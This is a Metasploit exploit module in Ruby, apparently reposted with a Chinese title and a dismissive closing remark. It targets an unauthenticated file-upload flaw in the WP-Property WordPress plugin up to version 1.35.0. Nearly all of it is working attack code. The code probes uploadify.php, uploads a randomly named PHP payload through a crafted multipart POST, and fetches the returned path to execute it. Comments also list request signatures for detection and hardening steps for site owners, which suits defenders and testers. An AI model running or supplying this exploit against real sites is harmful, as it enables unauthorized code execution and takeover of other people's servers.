WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

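# Framework core, plus the file that provides the PhpEXE mixin used by the module class.
require 'msf/core'
require 'msf/core/exploit/php_exe'
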
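# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the module description).
#
# Requests this module sends, useful when writing detections or reviewing logs:
# * a GET (check) and a multipart POST (exploit) to
#   <TARGETURI>/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
# * the POST carries a "Filedata" part whose filename is five random letters
#   plus ".php", and a "folder" part naming the uploadify directory
# * a final GET to whatever path the server returned in the upload response
#
# Hardening pointers for site owners: run a WP-Property release newer than the
# affected 1.35.0, remove or block third-party/uploadify/uploadify.php, and do
# not let the web server execute PHP from directories that accept uploads.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (references, targets, payload constraints)
  # and the single TARGETURI option.
  #
  # @param info [Hash] metadata passed down by the framework and merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the plugin's uploadify.php endpoint with a single GET.
  #
  # An HTTP 200 only shows that the script is reachable; nothing in this probe
  # reads the plugin version or exercises the upload handler, so the strongest
  # honest verdict is Detected rather than Appears. A patched or otherwise
  # protected install that still ships the file would answer the same way.
  #
  # @return [Exploit::CheckCode] Unknown when there is no response or a
  #   non-200 status, Detected when the endpoint answers with 200
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{wp_base_uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    return Exploit::CheckCode::Unknown if res.nil? || res.code != 200

    Exploit::CheckCode::Detected
  end

  # Uploads a randomly named .php file through uploadify.php and then requests
  # the path the server returned for it.
  #
  # Fails with UnexpectedReply when the upload response is missing, is not a
  # 200, or does not mention the uploaded file name.
  def exploit
    uri  = wp_base_uri
    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self => true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Removes a CRLF that sits at the start of a line directly in front of a
    # "--_Part_" boundary; presumably the upload handler does not parse the
    # body otherwise (not verifiable from this file).
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if res.nil? || res.code != 200 || res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the location of the stored file.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end

  private

  # Returns TARGETURI's path with exactly one trailing slash appended when it
  # is missing. A new string is built instead of appending with <<, so the
  # string owned by target_uri is never modified in place and repeated
  # check/exploit runs all start from the same value.
  #
  # @return [String] base path ending in "/"
  def wp_base_uri
    uri = target_uri.path.to_s
    uri.end_with?('/') ? uri : "#{uri}/"
  end
end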
不要问我这写的是什么 怎么利用 我是说msf.